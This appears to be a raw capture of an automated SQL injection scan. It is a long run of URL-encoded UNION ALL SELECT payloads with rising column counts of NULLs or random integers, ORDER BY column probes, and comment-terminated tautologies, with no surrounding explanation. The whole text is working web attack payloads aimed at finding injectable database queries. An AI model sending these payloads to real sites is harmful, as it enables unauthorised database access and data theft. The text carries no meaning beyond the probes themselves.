-6002%22%20UNION%20ALL%20SELECT%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%2C%204129%23%20AND%20%22kZfY%22%3D%22kZfY -2157%22%20UNION%20ALL%20SELECT%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%2C%206495%23%20AND%20%22OFLR%22%3D%22OFLR -7766%22%20UNION%20ALL%20SELECT%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%23%20AND%20%22zkXa%22%3D%22zkXa foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rjii%22%3D%22rjii foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22xqfc%22%3D%22xqfc foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Dpek%22%3D%22Dpek foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22PPFv%22%3D%22PPFv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22pUCp%22%3D%22pUCp foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VDch%22%3D%22VDch foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22CrMP%22%3D%22CrMP foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ODxL%22%3D%22ODxL foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22tICH%22%3D%22tICH foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Njwp%22%3D%22Njwp -6270%22%20UNION%20ALL%20SELECT%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%23%20AND%20%22jWwQ%22%3D%22jWwQ -5779%22%20UNION%20ALL%20SELECT%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%23%20AND%20%22rpXX%22%3D%22rpXX -3040%22%20UNION%20ALL%20SELECT%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%2C%208851%23%20AND%20%22SNNn%22%3D%22SNNn -8079%22%20UNION%20ALL%20SELECT%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%23%20AND%20%22khGP%22%3D%22khGP -2808%22%20UNION%20ALL%20SELECT%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%23%20AND%20%22AhNQ%22%3D%22AhNQ -2618%22%20UNION%20ALL%20SELECT%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%2C%205832%23%20AND%20%22qdow%22%3D%22qdow -4472%22%20UNION%20ALL%20SELECT%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%23%20AND%20%22DAXc%22%3D%22DAXc -7247%22%20UNION%20ALL%20SELECT%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%2C%208065%23%20AND%20%22CzFW%22%3D%22CzFW -3461%22%20UNION%20ALL%20SELECT%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%23%20AND%20%22qKnF%22%3D%22qKnF -2755%22%20UNION%20ALL%20SELECT%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%23%20AND%20%22zFgm%22%3D%22zFgm foo%22%20ORDER%20BY%201--%20%20AND%20%22FzmL%22%3D%22FzmL foo%22%20ORDER%20BY%207474--%20%20AND%20%22Sqix%22%3D%22Sqix foo%22%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%22wPWZ%22%3D%22wPWZ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%22adPX%22%3D%22adPX foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22xpts%22%3D%22xpts foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dUlK%22%3D%22dUlK foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22BJqy%22%3D%22BJqy foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22gQSm%22%3D%22gQSm foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rtBM%22%3D%22rtBM foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22QDsQ%22%3D%22QDsQ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22BfHa%22%3D%22BfHa foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22vWpY%22%3D%22vWpY -6455%22%20ORDER%20BY%201--%20%20AND%20%22dpGM%22%3D%22dpGM -4084%22%20ORDER%20BY%207122--%20%20AND%20%22EMmp%22%3D%22EMmp -4188%22%20UNION%20ALL%20SELECT%209891--%20%20AND%20%22EYEY%22%3D%22EYEY -5949%22%20UNION%20ALL%20SELECT%201394%2C%201394--%20%20AND%20%22YHFi%22%3D%22YHFi -4643%22%20UNION%20ALL%20SELECT%209404%2C%209404%2C%209404--%20%20AND%20%22THwQ%22%3D%22THwQ -3372%22%20UNION%20ALL%20SELECT%205425%2C%205425%2C%205425%2C%205425--%20%20AND%20%22RHRt%22%3D%22RHRt -5811%22%20UNION%20ALL%20SELECT%205940%2C%205940%2C%205940%2C%205940%2C%205940--%20%20AND%20%22HuxH%22%3D%22HuxH -6709%22%20UNION%20ALL%20SELECT%207239%2C%207239%2C%207239%2C%207239%2C%207239%2C%207239--%20%20AND%20%22BVqk%22%3D%22BVqk -7814%22%20UNION%20ALL%20SELECT%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317--%20%20AND%20%22pFqb%22%3D%22pFqb -4954%22%20UNION%20ALL%20SELECT%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145--%20%20AND%20%22gTcd%22%3D%22gTcd -7385%22%20UNION%20ALL%20SELECT%201277%2C%201277%2C%201277%2C%201277%2C%201277%2C%201277%2C%201277%2C%201277%2C%201277--%20%20AND%20%22tpKU%22%3D%22tpKU -8607%22%20UNION%20ALL%20SELECT%202450%2C%202450%2C%202450%2C%202450%2C%202450%2C%202450%2C%202450%2C%202450%2C%202450%2C%202450--%20%20AND%20%22OFZU%22%3D%22OFZU foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22WfZE%22%3D%22WfZE foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22xPpI%22%3D%22xPpI foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22OkAH%22%3D%22OkAH foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fDjD%22%3D%22fDjD foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dLtM%22%3D%22dLtM foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XmAX%22%3D%22XmAX foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22sjEH%22%3D%22sjEH foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22uEYf%22%3D%22uEYf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22OIbO%22%3D%22OIbO foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mmFi%22%3D%22mmFi -7901%22%20UNION%20ALL%20SELECT%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599%2C%204599--%20%20AND%20%22TtCN%22%3D%22TtCN -9017%22%20UNION%20ALL%20SELECT%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085%2C%204085--%20%20AND%20%22tgyD%22%3D%22tgyD -1660%22%20UNION%20ALL%20SELECT%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887%2C%206887--%20%20AND%20%22qHFz%22%3D%22qHFz -5485%22%20UNION%20ALL%20SELECT%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481--%20%20AND%20%22GruM%22%3D%22GruM -9326%22%20UNION%20ALL%20SELECT%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639%2C%201639--%20%20AND%20%22vIqe%22%3D%22vIqe -5679%22%20UNION%20ALL%20SELECT%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563--%20%20AND%20%22iEpO%22%3D%22iEpO -9325%22%20UNION%20ALL%20SELECT%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303--%20%20AND%20%22cKdG%22%3D%22cKdG -8594%22%20UNION%20ALL%20SELECT%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410--%20%20AND%20%22lRqk%22%3D%22lRqk -9814%22%20UNION%20ALL%20SELECT%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799--%20%20AND%20%22hNDP%22%3D%22hNDP -6802%22%20UNION%20ALL%20SELECT%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185--%20%20AND%20%22qQQE%22%3D%22qQQE foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22HqKB%22%3D%22HqKB foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rZqZ%22%3D%22rZqZ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wnoK%22%3D%22wnoK foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22CzJI%22%3D%22CzJI foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22WEDY%22%3D%22WEDY foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22awhH%22%3D%22awhH foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22MEug%22%3D%22MEug foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Ucya%22%3D%22Ucya 